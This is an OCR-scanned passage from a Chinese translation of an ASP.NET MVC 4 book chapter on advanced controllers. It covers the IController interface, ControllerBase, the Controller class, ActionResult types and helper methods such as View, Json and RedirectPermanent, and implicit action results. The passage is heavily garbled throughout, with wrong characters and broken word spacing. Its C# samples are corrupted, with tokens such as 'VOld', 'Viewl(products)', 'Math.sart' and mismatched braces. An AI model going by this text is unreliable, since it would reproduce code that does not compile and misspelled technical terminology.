public DateTime ReleaseDate 1{ get; sets; |] 


目 定 义 模 板 是 一 种 强大 的 机 制 ， 可 以 用 来 减少 应 用 程序 代码 的 编写 量 。 通 过 在 模板 内 
部 放 首 标准 约定 ， 我 们 束 可 以 实现 只 修改 一 个 文件 而 使 应 用 程序 发 生 巨 大 的 变化 。 


15.7 ”高 级 控制 器 

作为 ASPNET MVC 栈 的 中 流 研 柱 ， 控 制 器 具有 很 多 高 级 特性 ， 远 超出 第 2 章 所 介绍 
的 内 容 。 本 节 介 绍 控制 器 的 内 部 工作 原理 ， 以 及 在 一 些 高 级 应 用 中 使 用 它 的 方法 。 
15.7.1 定义 控制 器 : IController 接口 


全 此 已 经 掌握 了 控制 磺 的 基础 知识 ， 现 在 我 们 从 更 结构 化 的 角度 学 习 如 何 定 义 和 使 用 
控制 融 。 根 据 这 一 观点 ， 我 们 通过 聚焦 控制 右 的 任务 来 便 化 处 理 。 要 彻 抵 看 清 控制 融 ， 我 
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们 需要 理解 IController 接口 。 正 如 第 1 章 所 讨论 的 ，ASPNET MVC 的 重点 之 一 便 是 扩展 
性 和 灵活 性 。 当 使 用 这 种 方式 构建 软件 时 ， 通 过 使 用 接口 尽 可 能 地 利用 抽象 是 很 重要 的 。 

ASPNET MVC 中 的 控制 器 类 最 起 码 需要 实现 IController 接口 ， 而 且 按 照 约定 ， 类 型 
的 名 称 还 必须 以 Controller 后 缀 结束 。 该 命名 约定 实际 上 是 非常 重要 的 一 一 我 们 会 发 现 
ASPNET MVC 中 有 很 多 这 样 的 小 规则 ， 它 们 使 我 们 免 去 了 定义 配置 设置 和 特性 的 任务 而 
使 程序 开发 更 加 容易 。 然 而 ，IController 接口 的 抽象 功能 却 非常 简单 : 

public interface IController 

{ 


VOld Execute (ReguestContext requestContext);} 


} 


这 是 一 个 非常 简单 的 过 程 : 当 一 个 请 求 进 入 时 ， 路 由 系统 标识 一 个 控制 器 ， 并 调用 其 
中 的 Execute 方法 。 

IController 主要 是 为 每 个 想 把 目 定 义 控 制 器 框架 挂钩 到 ASPNET MVC 的 人 ， 提 供 一 
个 非常 简单 的 接口 。 本 章 后 面 讲 到 的 Controller 类 ， 就 是 在 该 接口 上 创建 的 很 多 有 趣 的 功 
能 之 一 。 这 正 是 ASPNET 中 常见 的 扩展 模式 。 

例如 ， 如 果 熟 悉 HITP 处 理 程序 ， 可 能 注意 到 IController 接口 和 IHttpHandler 接口 非 
节 相 似 : 


public interface IHttpHandler 

{ 
VOld ProcessRequest (HttpContext context)}); 
bool IsReusable 1{ get; } 

} 


暂 先 不 考虑 IsReusable 属性 ， 从 IController 和 IHttpHandler 的 作用 来 看 ， 它 们 两 个 几 
平 是 相同 的 。IController.Execute 和 IHttpHandler.ProcessRequest 两 个 方法 都 用 来 啊 应 请 求 ， 
并 辐 啊 应 流 中 发 送 一 些 输出 。 二 者 的 主要 区 别 是 参数 提供 的 上 和 下文 信 息 量 不 一 样 。 
IController.Execute 方法 接收 一 个 RequestContext 实例 ， 其 中 不 仅 包 括 HttpContext， 也 包括 
ASPNET MVC 请 求 的 其 他 相关 信息 。 

Page 类 可 能 是 ASPNET Web Forms 开发 人 员 最 熟悉 的 类 ， 由 于 它 是 ASPX 页 面 的 默 
认 基 类 ， 因 此 也 实现 了 IHttpHandler 接口 。 


15.7.2 ”ControllerBase 抽象 基 类 


正如 刚才 看 到 的 ， IController 接口 的 实现 非 帝 简单， 但 它 的 真正 作用 是 为 路 由 查找 控 
制 器 和 调用 Execute 方法 提供 便利 。 这 是 挂钩 到 请 求 系统 的 最 基本 钧 子 (hook), 但 是 整体 而 
言 它 基 本 上 没有 为 编写 的 控制 费 提 供 值 。 这 可 能 是 一 件 好 事 一 一 当 对 目 定 义 的 系统 强加 很 
多 限制 时 ， 许 多 目 定 义 开 发 工具 的 开发 人 员 都 会 不 吾 欢 。 一 些 开发 人 员 可 能 言 欢 靠近 API 
工作 ，ControllerBase 由 此 而 生 。 
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产品 小 组 的 话 

早期 ，ASPNET MVC 产品 团队 曾经 辩论 过 是 否 完 全 删除 IController 接口 。 想 实现 该 
接口 的 开发 人 员 可 以 通过 实现 他 们 自己 的 MvcHandler 来 代替 ， 因 为 MvcHandler 可 以 根据 
来 自足 由 的 请 求 果断 处 理 很 多 核心 执行 机 制 。 

然而 ， 最 终 决 定 保留 IController 接口 ， 因 为 ASPNET MVC 框架 的 其 他 特性 ( 像 
IControllerFactory 和 ControllerBuilder) 可 以 直接 与 它 交 互 一 一 这 给 开发 人 员 提 供 了 附加 值 。 


ControllerBase 类 是 一 个 抽象 基 类 ， 它 在 IController 接口 上 实现 了 很 多 API。 它 提供 了 
TempData 和 ViewData 属性 (它们 是 同 视 图 发 送 数 据 的 方式 ， 正 如 第 3 章 中 讨论 的 )。 此 外 ， 
ControllerBase 还 提供 了 Execute 方法 用 来 创建 ControllerContext。 与 HttpContext 实例 问 
ASPNET 提供 上 下 文 (在 元 素 之 间 提 供 请 求 和 啊 应 、URL 和 服务 器 信息 ) 类 似 ， 创 建 的 
ControllerContext 实例 为 当前 请 求 提 供 有 具体 的 MVC 上 下 文 。 

尽管 已 在 第 13 章 中 讨论 过 使 用 请 求 / 啊 应 数据 的 过 滤 和 工作 方式 ,可 以 从 ASPNET MVC 
的 操作 过 滤器 基础 设施 中 获 益 ， 但 是 ControllerBase 类 非常 轻便 ， 它 能 使 开发 人 员 为 他 们 
目 己 的 控制 器 提供 强大 的 目 定 义 实现 。 但 是 ， 它 没有 提供 把 操作 转换 为 方法 调用 的 能 力 。 
这 下 是 引入 Controller 类 的 原因 。 


15.7.3 控制 器 类 和 操作 


从 理论 上 讲 ， 实 现 ControllerBase 或 IController 接口 的 类 已 经 足够 用 来 构建 网 站 。 路 
由 通过 名 称 可 以 查找 一 个 Icontroller 接口 , 然后 调用 Execute 方法 , 这 样 我 们 就 得 到 了 一 个 
非常 基本 的 网 站 。 

然而 , 这 种 做 法 类 似 于 在 ASPNET 开发 中 使 用 原始 的 IHttpHandlers 一 一 尽管 它 可 以 使 
用 ， 但 我 们 是 在 做 白费 力 的 工作 一 一 探索 核心 框架 逻辑 。 

有 趣 的 是 ， 正 如 后 面 将 看 到 的 ，ASPNET MVC 本 身 是 在 HTTP 处 理 程序 之 上 创建 的 

层 ， 从 总 体 上 来 看 没 必 要 探索 ASPNET 的 内 部 机 制 是 如 何 改变 而 实现 MVC 的 。 相 反 ， 

ASPNET MVC 是 开发 团队 在 现 有 ASPNET 扩展 点 之 上 建立 的 新 框架 。 

编写 控制 融 的 标准 方法 是 让 它 继 承 System.Web.Mvc.Controller 抽象 基 类 ， 因 为 该 基 关 
继承 了 ControllerBase 基 类 ， 并 实现 了 IController 接口 。Controller 类 专门 设计 用 于 所 有 控 
制 占 的 基 类 ， 因 为 它 为 派生 于 它 的 控制 器 提供 了 很 多 非常 好 的 行为 。 

图 15-16 中 展示 了 IController、ControllerBase 和 抽象 基 类 Controller 之 间 的 关系 以 及 
ASPNET MVC 4 应 用 程序 默认 提供 的 两 个 控制 器 。 
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1. 操作 方法 


Controller 子 类 中 的 所 有 公共 方法 都 是 操作 方法 ， 它 们 可 以 通过 HTTP 请 求 进行 调用 。 
我 们 可 以 把 控制 右 分 解 成 多 个 操作 方法 ， 每 个 操作 方法 对 应 于 一 个 具体 的 用 户 输 入 ， 而 不 
是 Execute 方法 的 一 个 单 片 (nmonolithic) 实 现 。 


产品 小 组 的 话 

当 读 到 Controller 类 的 每 一 个 公共 方法 都 可 以 从 Web 中 调用 后 ， 我 们 可 能 直觉 地 认为 
该 方法 存在 安全 性 问题 。 产 品 小 组 针对 该 问题 也 进行 了 多 次 辩论 。 

最 初 , 每 个 操作 方法 要 求 ControllerActionAttribute 特性 应 用 于 每 个 可 调用 方法 。 然而 ， 
许多 人 觉得 这 违 到 了 DRY(Don’t Repeat Yoursel 人 原则 。 事 实证 明 ， 对 这 些 方 法 Web 可 调用 
特性 的 关注 与 选择 的 意义 存在 分 卜 。 

对 于 产品 小 组 来 说 ， 在 一 个 方法 是 Web 可 调用 之 前 就 会 存在 多 层级 选择 。 需 要 选择 的 
第 一 层级 是 一 个 ASPNET MVC 项 目 。 如果 问 一 个 标准 的 ASPNET Web Application 项 目 中 
添加 一 个 公共 Controller 类 , 那么 该 类 并 非 立 即 就 是 Web 可 调用 的 (尽管 向 ASPNET MVC 项 
目 中 添加 该 类 使 它 可 调用 )。 我 们 仍 需 使 用 与 该 类 相关 的 路 由 处 理 程序 (如 MvcRouteHandler) 
来 定义 一 个 路 由 。 

这 里 普遍 接受 的 是 ， 我 们 可 以 通过 继承 Controller 类 来 选择 这 一 行为 。 我 们 不 能 偶然 
这 样 做 。 即 便 这 样 做 了 ， 我 们 仍 需 定义 与 该 类 相关 的 路 由 。 


15.7.4 ActionResult 


如 前 所 述 ，MVC 模式 中 控制 器 的 作用 是 啊 应 用 户 输入 。 在 ASPNET MVC 中 , 操作 方 
法 是 啊 应 用 户 输入 的 基本 单位 。 操 作 方法 最 终 负 责 处 理 用 户 请 求 ， 并 输出 显示 给 用 户 的 啊 
应 ， 啊 应 内 容 通 常 是 HTML 标记 。 

操作 方法 遵循 的 模式 是 执行 请 求 它 做 的 任务 ， 最 后 返回 ActionResult 抽象 基 类 的 一 个 
实例 。 

ActionResult 抽象 基 类 的 源 代 码 如 下 : 

public abstract class ActjonResult 

{ 


Public abstract void ExecuteResult (ControllerContext context)}); 


} 
注意 ，ActionResult 类 中 只 包含 方法 ExecuteResult。 如 果 熟 悉 Command Pattern， 那 么 
也 应 该 熟悉 ActionResult。 操 作 结 果 代 表 操 作 方 法 想 让 框架 执行 的 命令 。 
操作 结果 通 第 用 于 框架 级 别 的 处 理 ， 而 操作 方法 主要 用 来 处 理应 用 程序 逻辑 。 例 如 ， 
当 进 入 的 请 求 要 求 显 示 一 个 产品 列表 时 ， 操 作 方 法 会 得 询 数 据 库 ， 并 将 正确 的 产品 汇聚 成 
-个 列表 来 显示 。 它 可 能 需要 根据 应 用 程序 中 的 业务 规则 执行 一 些 过 滤 。 此 时 ， 操 作 方 法 
完全 用 于 处 理应 用 程序 逻辑 。 
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然而 ， 访 方法 一 旦 准备 好 给 用 户 显 示 产 品 列 表 ， 我 们 可 能 不 希望 让 关注 于 视图 逻辑 的 
代码 来 担心 框架 提供 的 实现 细节 ， 比 如 直接 写 入 HTTP 啊 应 流 。 或 许 我 们 有 一 个 知道 如 何 
把 产品 集 格式 化 为 HTML 标记 的 模板 。 我 们 宁愿 不 把 这 些 信息 封装 在 操作 方法 中 ， 因 为 这 


我 们 使 用 的 一 项 技术 是 让 操作 方法 返回 一 个 ViewResult( 派 生 于 ActionResulb 对 象 ， 并 
把 数据 赋 给 该 对 象 实例 ， 然 后 返回 该 实例 。 在 这 一 点 上 ， 操 作 方 法 处 理 它 的 工作 ， 而 操作 
调用 者 将 要 调用 ViewResult 实例 上 的 ExecuteResult 方法 ， 剩 余 的 工作 由 ExecuteResult 方 
法 来 做 。 代 人 码 如 下 : 
public ActionResult ListProducts () 
{ 
//PSseudo code 
IList<Product> products = SomeRepository.GetProducts () ， 
ViewData.Model = products; 
return new ViewResult {ViewData = this.ViewData }; 
} 
在 实践 中 ， 我 们 可 能 从 没有 看 到 像 这 样 直 接 实 例 化 ActionResult 对 象 的 代码 。 相 反 ， 
我 们 通常 会 使 用 Controller 类 中 一 个 辅助 方法 ， 比 如 像 下 面 的 View 方法 : 
Public ActionResult ListProducts () 


{ 

//Pseudo code 

IList<Product> products = SomeRepository.GetProducts () ， 
return Viewl(products); 


} 
接 下 来 将 深入 讲解 ViewResult， 并 分 析 它 是 如 何 关 联 视 图 的 。 
1. 操作 结果 辅助 方法 


如 条 仔细 看 默认 ASPNET MVC 项 目 模板 中 的 默认 控制 右 操 作 方法 ， 融 会 此 现 操作 方 
法 不 会 直接 实例 化 ViewResult 对象。 例如， 下面 About 方法 的 源 代码 : 

public ActionResult About () 1 

ViewDatal"“Title"|] = "About Page ， 
return View(); 

} 

请 注意 ，About 方法 返回 了 View 方法 调用 的 结果 。Controller 类 包含 了 一 些 返 回 
ActionResult 实例 的 简便 方法 。 这 些 方 法 旨 在 帮助 操作 方法 的 实现 更 具 可 读 性 和 说 明 性 。 
通常 都 是 返回 这 些 简 便 方 法 调用 的 结果 ， 而 不 是 一 个 新 的 操作 结果 实例 。 

这 些 方法 通常 根据 返回 的 操作 结果 类 型 来 命名 ， 省 去 其 中 的 Result 后 级 。 因 此 ，View 
方法 返回 一 个 ViewResult 的 实例 。 同 样 ，Json 方法 返回 一 个 JsonResult 的 实例 。 但 是 有 一 
个 特殊 情况 就 是 RedirectToAction 方法 ， 它 返回 的 是 RedirectToRoute 的 一 个 实例 而 不 是 
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RedirectToActionResult 的 实例 。 

Redirect、RedirectToAction 和 RedirectToRoute 方法 都 发 送 HTTP 302 状态 公 ， 表 明 一 
个 临时 的 重 定向 。 当 内 容 永 久 移 除 时 ， 我 们 想 告知 客户 端 ， 我 们 正在 使 用 HTTP 301 状态 
码 。 这 样 做 的 一 个 主要 好 处 是 搜索 引擎 优化 。 当 过 到 HTTP 301 状态 码 时 ， 搜 索引 擎 会 更 
新 搜索 结果 中 显示 的 URL; 更 新 过 期 的 链接 通 第 也 对 搜索 引擎 排名 有 一 定 的 影响 。 出 于 这 
个 原因 ， 返 回 RedirectResult 的 每 个 方法 都 对 应 一 个 返回 HTTP 301 状态 码 的 方法 ， 它 们 分 
别 是 RedirectPermanent、RedirectToActionPermanent 和 RedirectToRoutePermanent。 注 意 ， 
浏览 句 和 其 他 客户 疹 都 会 缓存 HITP 301 啊 应 ， 因 此 ， 我 们 不 应 该 使 用 这 些 啊 应 信息 ， 除 
非 确定 重 定 阿 是 永久 的 。 

表 15-4 列举 了 现 有 方法 及 其 返回 类 型 。 

表 15-4 返回 ActionResult 实例 的 控制 器 方法 


方 法 描 述 
Redirect 返回 一 个 RedirectResult 对 象 ， 把 用 户 重 定 问 到 一 个 合适 的 URL 
RedirectPermanent 与 Redirect 一 样 ， 但 它 返 回 一 个 把 Permanent 属性 设置 为 true 的 
RedirectResult， 因 此 ， 返 回 一 个 HITP 301 状态 码 
RedirectToAction 返回 一 个 RedirectToRouteResult 对 象 ,根据 提供 的 路 由 值 把 用 户 重 定 同 
到 一 个 操作 方法 


RedirectToActionPermanent | 与 RedirectToAction 一 样 ， 但 它 返 回 一 个 把 Permanent 属性 设置 为 true 
的 RedirectResult， 因 此 ， 返 回 一 个 HTTP 301 状态 码 

RedirectToRoute 返回 一 个 RedirectToRouteResult 对 和 象 ,把 用 户 重 定 周到 匹配 指定 路 由 值 
的 URL 

RedirectToRoutePermanent | 与 RedirectToRoute 一 样 ， 但 它 返回 一 个 把 Permanent 属性 设置 为 true 
的 RedirectResult， 因 此 ， 返 回 一 个 HTTP 301 状态 码 


View 返回 一 个 ViewResult 对 象 ， 回 啊 应 流 中 谊 染 一 个 视图 

PartialView 返回 一 个 PartialViewResult 对 象 ， 向 响应 流 中 泻 染 一 个 部 分 视 

Content 返回 一 个 ContentResult 对 象 ， 回 啊 应 流 中 编写 指定 的 内 容 ( 字 符 串 ) 

File 返回 一 个 派生 上 自 FileResult 的 类 ， 同 响应 流 中 编写 二 进 制 内 容 

Json 返回 一 个 JsonResult 对 象 , 其 中 包含 将 一 个 对 象 序列 化 为 JSON 的 输出 

JavaScript 返回 一 个 JavaScriptResult 对 象 ， 其 中 包含 当 返 回 到 客户 端 就 立即 执行 
的 JavaScript 代码 


2. 操作 结果 类 型 


ASPNET MVC 包含 一 些 执行 常见 任务 的 ActionResult 类 型 。 表 15-5 列举 了 这 些 类 型 。 
后 而 会 对 每 一 种 类 型 进行 详细 介绍 。 
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表 15-5 ActionResult 类 型 描述 


ActionResult 类 型 描 述 
ContentResult 直接 把 指定 内 容 作 为 文本 编写 到 啊 应 流 中 
EmptyResult 代表 一 个 null 或 空 啊 应 ， 不 做 任何 处 理 
FileContentResult 派生 于 FileResult 类 ， 回 啊 应 流 中 编写 一 个 字 节 数组 
FilePathResult 派生 于 FileResult 类 ， 根 据 文 件 路 径 癌 啊 应 流 中 编写 一 个 文件 
FileResult 作为 一 组 回流 中 编写 一 个 二 进 制 啊 应 的 结果 的 基 类 。 用 来 将 文件 返回 给 用 户 
FileStreamResnult 派生 自 FileResult 类 ， 向 响应 中 编写 一 个 流 
HttpNotFound 派生 目 HttpStatusCodeResult 类 。 给 用 户 返 回 一 个 指示 找 不 到 请 求 资源 的 


HTTP 404 响应 代码 

HttpStatusCodeResult 返回 一 个 用 户 指定 的 HTTP 代码 

HttpUnauthorizedResult | 派生 于 HttpStatusCodeResult 类 。 问 客户 中 返回 一 个 HITP 401 啊 应 代码 ， 
表明 请 求 者 在 请 求 的 URL 中 没有 请 求 资源 的 授权 


JavaScriptResult 用 来 在 客户 器 立 即 执行 从 服务 器 返回 的 JavaScript 代码 

JsonResult 将 给 定 对 象 序列 化 为 ISON， 并 向 响应 流 中 编写 该 JSON， 通 常用 于 响应 
Ajax 请 求 

PartialViewResult 类 似 于 ViewResult 对 象 ， 它 回 啊 应 流 中 泻 染 一 个 部 分 视图 ， 通 常用 于 啊 应 
Ajax 请 求 

RedirectResult 根据 Boolean 类 型 的 Permanent 标记 , 返回 一 个 临时 的 重 定 回 编码 302 或 永 


入 的 重 定 同 编码 301， 把 请 求 者 重 定 向 到 男 一 个 URL 
RedirectToRouteResult 类 似 于 RedirectResult, 但 是 它 把 用 户 重 定 同 到 一 个 通过 路 由 参数 指定 的 
URL 
ViewResult 调用 视图 引擎 来 向 啊 应 流 中 泻 染 一 个 视图 


ContentResult 
ContentResult 通过 Content 属性 将 它 指定 的 内 容 编 写 到 啊 应 流 中 。 它 也 允许 通过 
ContentEncoding 属性 指定 内 容 编码 方式 ， 通 过 ContentType 属性 指定 内 容 类 型 。 
如 果 没 有 指定 编码 方式 , 就 使 用 当前 HttpResponse 实例 的 内 容 编码 方式 .HttpResponse 
的 默认 编码 方式 在 web.config 文件 的 全 局 化 元 素 中 指定 。 
同样 ,如 果 不 指定 内 容 类 型 ,也 将 使 用 当前 HttpResponse 实 例 的 内 容 类 型 .HttpResponse 
默认 的 内 容 类 型 是 text/html。 


EmptyResult 
顾名思义 , EmptyResult 用 来 指示 框架 将 不 做 任何 处 理 。 这 是 遵照 一 个 称 为 空 对 象 模式 
(Null Object pattermm) 的 设计 模式 , 它 用 一 个 实例 替换 null 引用 。 在 这 个 实例 中 , ExecuteResult 
方法 有 一 个 空 实 现 。 这 种 设计 模式 在 Martin Fowler 的 书籍 


Refactorine: Improving the 
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Desiegn of Existing Code(Addison-Wesley 出 版 ，1999) 一 一 中 引入 。 想 了 解 EmptyResult 的 更 
多 内 容 ， 请 登录 网 址 http://martinfowler.com/blikirefactoring.html。 


FileResult 

除了 用 来 回 啊 应 流 中 编写 二 进 制 内 容 ( 比 如 磁盘 上 的 Microsof Word 文档 或 SQL Server 
中 blob 列 的 数据 ) 之 外 ，FileResult 类 与 ContentResult 类 非常 类 似 。 设 置 结果 上 的 File- 
DownloadName 属性 将 为 Content-Disposition 头 部 (headenD 设 置 一 个 合适 的 值 ， 从 而 可 以 给 
用 户 呈 现 一 个 文件 下 载 对 话 框 。 

FileResult 是 以 下 3 个 不 同文 件 结果 类 型 的 抽象 基 类 : 

es FilePathResult 

® FileContentResult 

© FileStreamResult 

它们 的 使 用 通常 是 这 照 工厂 模式 ， 也 就 是 根据 有 具体 调用 的 File 重 载 方法 (后 面 会 介绍 ) 
决定 返回 哪个 具体 类 型 。 


HttpStatusCodeResult 
HttpStatusCodeResult 提供 了 一 种 使 用 一 个 具体 的 HTTP 啊 应 状态 码 和 描述 来 返回 操作 
结果 的 方式 。 例如， 为 了 通知 请 求 者 一 个 资源 永久 不 可 用 ， 可 以 返回 一 个 410( 消 失 )HTTP 状 
态 码 。 假 如 已 经 果断 决定 我 们 的 商店 停止 销售 disco 专辑 ， 那 么 我 们 可 以 更 新 StoreController 
控制 器 的 Browse 操作 ， 让 其 返回 一 个 410 HITP 代码 (如 条 有 用 户 搜索 disco 的 话 )。 
public ActionResult Browse (string genre) 
{ 
1if(genre.Equals("disco",SstringComparison.1lnvariantCulturelgnoreCase)) 
return new HttpSstatusCodeResult (410); 
Var genreModel = new Genre { Name = genre 1};} 


return ViewlgenreModel);} 


} 


根据 常见 的 HTTP 状态 码 ， 可 以 分 为 $ 个 具体 的 ActionResult， 正 如 表 15-5 中 列举 的 
那样 : 

® HttpNotFoundResult 

® HttpStatusCodeResult 

ee HttpUnauthorizedResult 

es RedirectResult 

® RedirectToRouteResult 

其 中 ,RedirectResult 和 RedirectToRouteResult( 后 而 会 介绍 ) 依 据 的 是 HTTP 301 和 HTTP 
302 啊 应 码 。 


JavaScriptResult 
JavaScriptResult 用 来 在 客户 端 执行 服务 器 返回 的 JavaScript 代码 。 例 如 ， 当 使 用 内 置 
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的 Ajax 辅助 方法 请 求 一 个 操作 方法 时 ， 该 方法 束 会 返回 一 段 可 以 在 客户 端 立 即 执行 ( 当 它 
到 达 客 户 端 时 ) 的 JavaScript 代码 : 
public ActionResult DoSsomething() 1{ 


script s = "$('#some-div') .html ("Updated!'')});"; 


return Javascript (s); 


} 
可 以 通过 如 下 代码 调用 上 面 的 方法 : 


二 和 汗 : 员 ]a 引 XXX-ACtLIonLInKI( -CLICK ， "DoSomething", new AjaxOptions()) 者 > 
<div id="some—div"></div> 


这 里 假设 已 经 引用 了 Ajax 库 和 jQuery。 


JsonResult 

JsonResult 使 用 JavaScriptSerializer 类 把 它 的 内 容 ( 通 过 Data 属性 指定 ) 序 列 化 为 
JSON(JavaScript Object Notatiom) 格 式 。 这 对 于 需要 操作 方法 返回 JavaScript 容易 处 理 格式 
的 数据 的 Ajax 方案 是 有 用 的 。 

与 ContentResult 类 似 ，JsonResult 的 内 容 编码 方式 和 内 容 类 型 也 都 可 以 通过 属性 来 设 
置 。 仅 有 的 区 别 是 默认 的 ContentType 是 application/json 而 不 是 text/html。 

注意 JsonResult 是 序列 化 整个 对 象 图 。 因 此 ， 如 果 给 它 一 个 包含 20 个 Product 实例 的 
ProductCategory 对 象 ， 那 么 每 个 Product 实例 也 将 被 序列 化 并 包含 在 JSON 中 发 送 到 啊 应 
流 中 。 现 在 想象 一 下 , 如 果 每 个 Product 对 象 又 有 一 个 包含 20 个 Order 实例 的 Orders 集合 。 
正如 想象 的 ，JSON 响应 会 迅速 增长 。 

目前 还 没有 办 法 能 够 限制 序列 化 到 JSON 中 的 数据 量 ， 因 此 ， 包 含有 大 量 属 性 和 集合 
的 对 象 (比如 那些 通过 LINQ 转化 到 SQL 时 生成 的 对 象 ) 要 序列 化 为 JSON 是 个 很 棘手 的 问 
题 。 针 对 这 一 问题 ， 推 荐 的 方法 是 创建 一 个 新 类 型 ， 其 中 包含 的 信息 与 想 在 JsonResult 中 
包含 信息 一 样 。 这 种 情况 下 ， 匿 名 类 型 能 够 派 上 用 场 。 

例如 ， 在 上 述 情 形 中 ， 不 是 序列 化 ProductCategory 的 一 个 实例 ， 而 是 使 用 一 个 匿名 对 
象 初 始 化 器 来 传递 需要 的 数据 ， 代 码 示 例如 下 : 


public ActionResult PartialJson (1) 


{ 
Var category = new ProductCategory 1{ Name="Partial™};}; 
Var result = new i 
Name = category.Name., 
ProductCount = category.Products .Count 
}; 
return Jsonl(lresult),;} 
} 


在 这 个 示例 中 ， 所 有 需要 的 信息 是 类 别名 称 和 该 类 别 中 的 产品 数量 。 我 们 是 从 实际 对 
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象 中 拉 取 这 些 需 要 的 信息 ， 并 把 它们 存储 在 一 个 名 为 result 的 匿名 类 型 实例 中 ， 然 后 序列 
化 该 匿名 类 型 实例 ， 而 不 是 序列 化 整个 对 象 图 。 我 们 最 后 把 序列 化 后 的 result 实例 发 送 到 
响应 流 ， 而 不 是 发 送 整个 对 象 图 。 这 个 方法 的 另 一 个 好 处 是 ， 我 们 不 会 在 不 经 意 间 序 列 化 
不 想 在 客户 端 显示 的 数据 ， 比 如 任何 内 部 产品 代码 、 库 存量 和 供应 商 信息 等 。 


RedirectResult 

RedirectResult 执行 一 个 (通过 Url 属性 设置 的 ) 到 指定 URL 的 HTTP 重 定 同 。 在 内 部 ， 
该 结果 调用 HttpResponse.Redirect 方法 来 把 HTTP 状态 码 设 置 成 HTTP/1.1 302 Object 
Moved， 从 而 使 得 浏览 右 为 指定 的 URL 立即 发 出 新 的 请 求 。 

从 技术 角度 看 ， 我 们 可 以 在 操作 方法 中 直接 调用 Response.Redirect 方法 ， 但 是 使 用 
RedirectResult 方法 会 把 这 个 操作 推 返 到 操作 方法 完成 它 的 处 理 之 后 。 这 对 于 单元 测试 操作 
方法 和 帮助 保持 操作 方法 外 部 的 基本 框架 细节 是 有 用 的 。 


RedirectToRouteResult 

RedirectToRouteResult 执行 HTTP 重 定 同 的 方式 类 似 于 RedirectResult， 但 不 同 的 是 它 
不 直接 指定 URL， 而 使 用 Routing API 来 决定 重 定向 到 的 URL。 

注意 表 15-4 定义 了 返回 该 类 型 结果 的 两 个 简便 方法 : RedirectToRoute 和 RedirectToAction。 

正如 前 面 讨 论 的 ， 有 三 个 额外 的 方法 可 以 返回 HTTP 301( 永 久 删 除 ) 状 态 码 : 
RedirectPermanent、RedirectToActionPermanent 和 RedirectToRoutePermanent。 


ViewResult 

ViewResult 是 使 用 最 广泛 的 操作 结果 类 型 。 它 调用 IViewEngine 实例 中 的 FindView 方 
法 ， 并 返回 一 个 IView 实例 ， 然 后 再 调用 IView 实例 上 的 Render 方法 ， 该 方法 用 来 向 响应 
流 中 泻 染 输出 内 容 。 一 般 情 况 下 ， 这 会 回 格 式 化 显示 数据 的 视图 模板 中 插入 指定 的 视图 数 
据 ( 即 操作 方法 准备 在 视图 中 显示 的 数据 )。 


PartialViewResult 

PartialViewResult 的 工作 方式 几乎 和 ViewResult 一 样 ， 除 了 它 是 调用 FindPartialView 
方法 (而 不 是 FindView 方法 ) 来 定位 视图 。 它 主要 用 来 演 染 部 分 视图 ， 因 此 ， 在 使 用 Ajax 
技术 把 新 的 HTML 更 新 到 部 分 页 面 的 部 分 更 新 情形 中 ， 筷 是 非常 有 用 的 。 


3. 隐 式 操作 结果 


- 般 情 况 下 ，ASPNET MVC 和 软件 开发 中 一 个 永恒 不 变 的 目标 ， 就 是 要 尽 可 能 明确 
代码 的 意图 。 假 如 有 一 个 非常 简单 的 操作 方法 ， 只 用 来 返回 一 小 段 数据 。 在 这 种 情形 下 ， 
让 操作 方法 的 签名 反映 它 返回 的 信息 是 很 有 帮助 的 。 

为 了 突出 这 一 点 ， 考 虑 一 个 计算 两 点 之 间距 离 的 Distance 方法 。 该 操作 可 以 直接 写 入 
响应 流 中 一 一 正如 第 2 章 2.3.2 节 中 的 第 一 个 控制 器 操作 所 示 。 然 而 ， 返 回 一 个 值 的 操作 
也 可 以 写成 如 下 形式 : 
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public double Distance (int xl1l, int yl, int x2, int vy2) 
{ 
double xSquared = Math.Pow (x2 一 和 LI，2) 7; 
double ySquared = Math.Pow(y2 — yl, 2); 
return Math.sart (xSquared + ySquared);}; 
} 
注意 ， 上 和 耐 方法 的 返回 类 型 是 double 而 不 是 派生 于 ActionResult 的 类 型 。 这 是 完全 可 
以 接受 的 。 当 ASPNET MVC 调用 该 方法 ， 并 发 现 返 回 类 型 不 是 一 个 ActionResult 时 ， 它 
会 自动 创建 一 个 包含 该 操作 方法 结果 的 ContentResult， 并 在 内 部 作为 ActionResult 使 用 。 
要 牢记 一 件 事 ，ContentResult 要 求 一 个 字符 串 值 ， 所 以 操作 方法 的 结果 需要 首先 转换 
成 一 个 字符 串 ,为 此 ,在 它 传 递 到 ContentResult 以 前 ,ASPNET MVC 会 使 用 InvariantCulture 
调用 结果 上 的 ToString 方法 。 如 果 需 要 根据 特定 的 区 域 格式 化 结果 ， 就 应 该 明确 地 返回 一 
个 ContentResult。 
最 后 ， 上 面 的 方法 大 致 等 价 于 下 面 的 方法 : 
Public ActionResult DIStance(1Int xl1, jnt yl, int x2, int vy2) 
{ 
double xSquared = Math.Pow (x2 一 XxXl, 2)} 
double ysSquared = Math.Powl(yY2 — yl, 2); 
double distance = Math.sart (xSquared + ySquared); 
return Content (Convert.ToString (distance, 


CultureInfo.InvariantCulture}))}); 


} 

第 一 个 方法 的 优势 是 它 使 得 我 们 的 意图 更 加 清晰 ， 更 便于 对 方法 进行 单元 测试 。 

表 15-6 列 出 了 当 编 写 没 有 ActionResult 返回 类 型 的 操作 方法 时 期 望 的 各 种 隐 式 约定 。 
表 15-6 ”操作 方法 的 隐 式 约定 


返回 值 描 述 
Null 操作 调用 器 用 EmptyResult 的 一 个 实例 替换 null 结果 。 这 是 采用 了 空 对 象 模式 。 
因此 ， 编 写 自 定义 操作 过 滤器 时 不 必 担 心 null 操作 结果 
Void 操作 调用 器 把 操作 方法 作为 返回 null 处 理 ， 因 此 返回 EmptyResult 对 象 
其 他 不 派生 目 操作 调用 器 使 用 InvariantCulture 调用 对 和 象 的 ToString 方法 ， 然 后 把 结果 字符 串 


ActionResult 的 对 象 | 封装 到 ContentResult 实例 中 


注意 ”创建 ContentResult 实例 的 代码 被 封装 在 操作 调用 器 上 一 个 称 为 

CreateActionResult 的 虚拟 方法 中 。 对 于 这 些 想 返回 一 个 不 同 隐 式 操作 结果 类 

型 的 开发 人 员 ， 可 以 编写 一 个 消费 者 操作 调用 器 ， 该 调用 器 需要 继承 
ControllerActionInvoker 类 ， 并 重 写 其 中 的 CreateActionResult 方法 。 

一 个 示例 可 能 已 经 从 操作 方法 有 返回 值 ， 返 回 的 值 自动 由 JsonResult 包装 。 
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15.7.5 ”操作 调用 希 


